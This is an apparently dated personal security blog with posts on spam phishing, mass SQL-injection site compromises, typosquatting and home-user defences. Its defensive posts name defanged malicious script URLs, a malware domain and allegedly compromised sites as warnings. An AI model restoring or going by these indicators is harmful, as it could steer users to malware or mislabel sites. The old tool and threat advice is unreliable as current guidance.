Computer Security Weblog

A new twist to on old scam, I had someone report SPAM e-mail that was sent that appeared to come from Microsoft. A quick little research online led me to know this has been around for a few years but it has a different twist.

As you can see, this was the entire body of the e-mail.  Nothing to sell.  No e-cards to click on.  No official document from some bogus US Court.  Just 3 innocent looking links from everyone’s friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and they are being kind enough to add an Unsubscribe link. Since you never really subscribed to this in the first place, they are hoping to get people to click the Unsubscribe link so they won’t have this sent anymore.  All because they respect your privacy. Taking a closer look at the 3 links, they all lead you to the same URL. The IP for the URL was registered in the USA. A quick Google search of the domain showed a lot of Russian language found on references to this domain.  After taking a closer look, all this URL did was to redirect you to a site that was registered in Korea. This gives you a little more insight on how SPAM e-mail can be a threat.  If this trail would have been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have run against the PC and if it were not patched, then remote code execution could be possible, meaning the PC would have been added to someone’s criminal botnet and used in nefarious ways.

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.

The Shadowserver.org does great work and informs the security community on the darker side of the Internet. In their most recent posting, they have listed the sites that are serving up the malicious content. Here is the list of sites and the number of sites injected with each of these malicious domains.  Please be advised….DO NOT VISIT ANY OF THESE SITES.

Most of the time, attacks from the Internet are silent.  You may not have realized that clicking on your favorite web site silently redirected you to a server in China and then exploits from Microsoft’s Internet Explorer, Firefox, QuickTime, Realplayer, and other applications are run on your PC. If you haven’t patched all your software, some bad guy attacker might just be able to take control of your machine and then be able to execute code remotely.  Those are words you really don’t want to hear.

Eventually, your anti-virus vendor gets the signatures of the bad software loaded on your machine and can clean it off.  But how did it get there?  What do I use my PC for?  Do I bank online?  Do I access my investment accounts online?  Do I store personal information about myself or my family in a document saved on the PC’s hard drive?  Then you need to take steps in trying to figure out just what happened.

First of all, is your software patched?  If not, then download your patches from Microsoft, Apple, RealPlayer, or any other applications and apply those security patches.  Set up a process in making sure your PC is scanned regularly and you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow stories posted online.  If it is a big name site like CNN.com or USAToday.com, then you might know.  Hundreds of thousands of sites get hacked and you never really know.  You could possibly defend against these attacks by using a tool called NoScript with your Firefox browser.

Do you store passwords for sites so when you browse to them?  Are any of those holding a credit card of yours?  If you’ve read my blog much, I advise you not use the function that will remember passwords to sites.

One thing you will have to remember.  The Internet was not set up to handle secure transactions.  It was set up to share information.  Bad guys are taking advantage of all the vulnerabilities out there.  I can not guarantee you will be completely safe even following all these steps.  You can follow best practices and be safer than the average person.  If you have teenagers, your battle will be an uphill fight.  Teenagers trust everyone.  Clicking things that need not be clicked.  Think about having a computer you adults use, then one that the teenagers use.  You’ll still have to fight off attacks on the teenagers PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right. Yet another code injection attack that is new. Just prior to writing this post, it showed 855,000 pages infected with some malicious (BAD!!) code that was injected into legitimate sites. NoScript is one defense, since this code is hosted on another domain.

The attack that I wrote about that started last week just hasn’t really taken off. Doing a Google search shows 25,500 pages that were affected by this one. It is early in the game for both of these attacks so more details will come out later. I’ll do more checking on the current attacks to see where those bad sites are being hosted.

The two sites in this new attack are listed below.  I’ve altered the URL.  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js

Stay safe and HAPPY MOTHER’S DAY!!!

Well it doesn’t appear that this attack is spreading. I just did a Google search on one of the redirect domains and it showed only 14,000 pages. Not as efficient as the last one that blasted several hundred thousand pages. Still see some of the same names on this list and it seems that the smaller organizations who probably don’t have full time staff to work on them and may not even know their sites have been compromised. Here is a short list of a few of the domains that still are making an appearance in Google. Remember that they may have been cleaned and Google hasn’t caught up with their spiders.

hxxp://www.wiredseniors.com

hxxp://www.moviesunlimited.com

hxxp://www.seniorstravelguide.com

hxxp://www.cancerissues.com

hxxp://www.reducecholesterol.org

hxxp://www.coloradowheelchairsports.org

hxxp://www.peta.org    (All you PETA freaks can still go there though.  Happy Surfing.  All my friends stay clear)

hxxp://www.seniorshomeexchange.com

hxxp://www.adhdissues.com

hxxp://www.goodtime-tickets.com

hxxp://www.matcmadison.edu

hxxp://www.coolbuddy.com

I’ll give an update on this if things pick up.  If you want to see the number of sites infected Google with

winzipices.cn and you’ll get a pretty long list.  Stay away unless you want your PC compromised.  Stay safe and take care.

I don’t have a lot of information at this time other than it appears that there is another SQL injection attack similar to the attacks we’ve seen where legitimate sites are redirecting to sites in China that are then launching different attacks that can compromise a machine. It may take a few days but there will be more information coming out about the details of this attack but at this time, there isn’t a lot out there. If you want to read more, you can go to the Internet Storm Center page by clicking here and reading what they know.

As more information becomes available, I’ll post another story. Take care and have a safe week!

Happy Thursday!  It’s really Wednesday night but many won’t read this until tomorrow.  If you are like me, you have your favorite sites you go to.  Sometimes you have them marked as a favorite and sometimes you just type it in the address bar of your favorite browser.  Now for me, I use the Firefox browser and I have NoScript addon installed.  I’ve written about that addon before.  I HIGHLY recommend to add it if  you already use Firefox.

Sometimes if you want to go to Google.com to search for some topic you are researching, be careful how you type it in.  There are times that want to type google.com but you type in gooogle.com.  Or gogle.com.  When you mis-type it, you actually go to site and it may not be a friendly site.  This practice is known as cyber squatting.  People register websites close to a high traffic website and when people type in the wrong address, they are taken to a site they really don’t want to go.  Sometimes cyber squatting is done to make money.  For example, if you can predict a candidate who will run for office then you can register a site at GoDaddy.com and then let them pay you for your website.  Like Hillaryforpresident.com.  Not sure that is actually a  real site but it probably is.  That is just an example.  You have to be quick though.

The reason I say to be careful is that there are those cyber criminals who have set up sites that will run exploits against any visitor to their sites.  So when typing in your favorite sites, be very careful what you type in.  Where you are taken may not be a nice place.  Stay safe and take care.  Go Jayhawks!!!

This week, another cyber attack against legitimate sites is going on.  Some of the security companies have been writing some articles about it.  Not a whole lot of details are known at this time but some of the sites include several .edu’s, .gov’s, and of course there is always the big names.  In this instance, it was Trend Micro.  A computer security company.  They’ve taken care of the pages that were hacked.   Similar to the other attacks earlier this year,  the web applications themselves have been attacked then serve up exploits to any visitor to that site.

In an Internet Storm Center Diary post lists what vulnerabilities that are being used in this latest attack.  What do you to defend against these types of attacks?  Well, regular readers have heard it from me before but the answer is the same.  PATCH!!!!!   Pretty simple.  The weaknesses listed in this current post are all Microsoft patches from 2006 and 2007.  Not listed but are used more often are some of the third party applications like Adobe Reader, RealPlayer, WinZip, WinAmp, and on and on and on.  These applications need patches too so don’t forget those.

It’s Big 12 tournament has started so I’m pumped up.  Rock Chalk Jayhawk.  GO KU!  That is it for now.  Have a great weekend and may your favorite team win unless they are playing the Kansas Jayhawks!!

Well a couple of days ago the WordPress website was attacked using a Denial of Service attack (DoS). I understand there were times that some of us were unable to actually log in to our blogs. I didn’t have any problem on my account but I’m sure it was a timing thing for me. Hopefully not too many were affected by this attack.

Not really sure why WordPress was attacked. In a DoS attack, a website is sent many many requests, too many to handle, from many bots that are out there. They can be instructed to actually send requests…so many in fact that the website can’t handle the volume of visits to the site. Of course if many of us would keep our PC’s clean, then we wouldn’t have so many bots to do their malicious deeds.

Hope you have enjoyed reading my blog. It’s pretty dry, a bit boring, down right blah. But if you do the things I suggest, then there would be less malicious activity. As it is for now, there are literally millions of bots out there being controlled by different organized groups. If you remember Estonia DoS attacks late last year, this was another high profile use of bots. They can be used to profit, attack for reasons of extorting money, or even for political reasons.

My point in this story is to learn as much as you can about computer security so you aren’t either a victim of these attackers or you can surely reduce your risk out there. Patching is probably the best thing you can do on your PC. Being careful where you are surfing too also makes a difference. Don’t surf porn or P2P sites file sharing sites. Use some of the tools I suggest for your browser and other things. Reading is your best defense. Keeping informed. Unite, patch, and be happy!!

Take care and have a great Friday and weekend. I know I will!! Rock chalk Jayhawk!! GO KU!!!!

With the latest JavaScript attacks that we’ve been seeing, it now is very important that you take steps that will protect you from all the criminal attackers that try to take advantage of you.  You had the uc8010 attacks, then you had the webservers that were being compromised and any website hosted on that webserver was spreading their crimeware to all who visited.  I’ve written about both attacks.

So what to do?   It sometimes is like a broken record but I’ll repeat it hear.  Patching your software is important.  Very important.  What tools can you use?  Well try Shavliks Google Gadget.  Click here to get this great tool.  Many of the attacks are against known vulnerabilities.  Knowing what applications you have that need patching is one of the most important things you can do.  You can’t defend yourself against 0-Day attacks (there is no patch for the vulnerability) but this will go along way to protect yourself.

Up to date anti-virus and an up to date anti-malware applications.  I use AVG’s AV and anti-malware.  Keep the updates current.  Run these tools on your system so you can keep things clean.  Click here for these downloads.  Also install a more robust firewall.  I use the free version of Comodo Firewall.  Click here for your free download.

Be VERY careful when opening e-mails.  They may seem to be from someone you know, but you really need to be very careful about unsolicited e-mails asking for personal information.  Never give this private information out.  Don’t click on those links either.  They are already seeing Valentines malware, along with Super Bowl sites that are really malicious sites.  Then tax time is right around the corner and then comes Easter, and so on, and so on.  You get the point.  And be VERY careful when e-mails are sent telling you about recent world events like storms, assassinations, or current tragedies, don’t click on these types of links.

While we are at it, lets talk strong passwords.  You really ought to secure any of your financial sites with strong passwords where you use upper and lower case letters, numbers, and special characters.  A password of more than 8 characters would be a good idea too.

Use an alternative browser to Microsoft’s Internet Explorer.  I use the Firefox browser.  I added the NoScript addon as a defense against these latest attacks.  You have to actually do some work but in the long run, you’ll be safer.  This is no guarantee that you will stay safe but it goes a lot farther than not doing anything at all.

These are just a few things you can do.  Do them all and you will be safer.  I used to say stay away from porn and peer 2 peer downloading sites where you download music or movies illegally, and you will stay fairly safe.  With the latest JavaScript attacks, you can’t say that anymore.  So take these extra steps and it will keep you safer.

Stay safe, and take steps to protect yourself!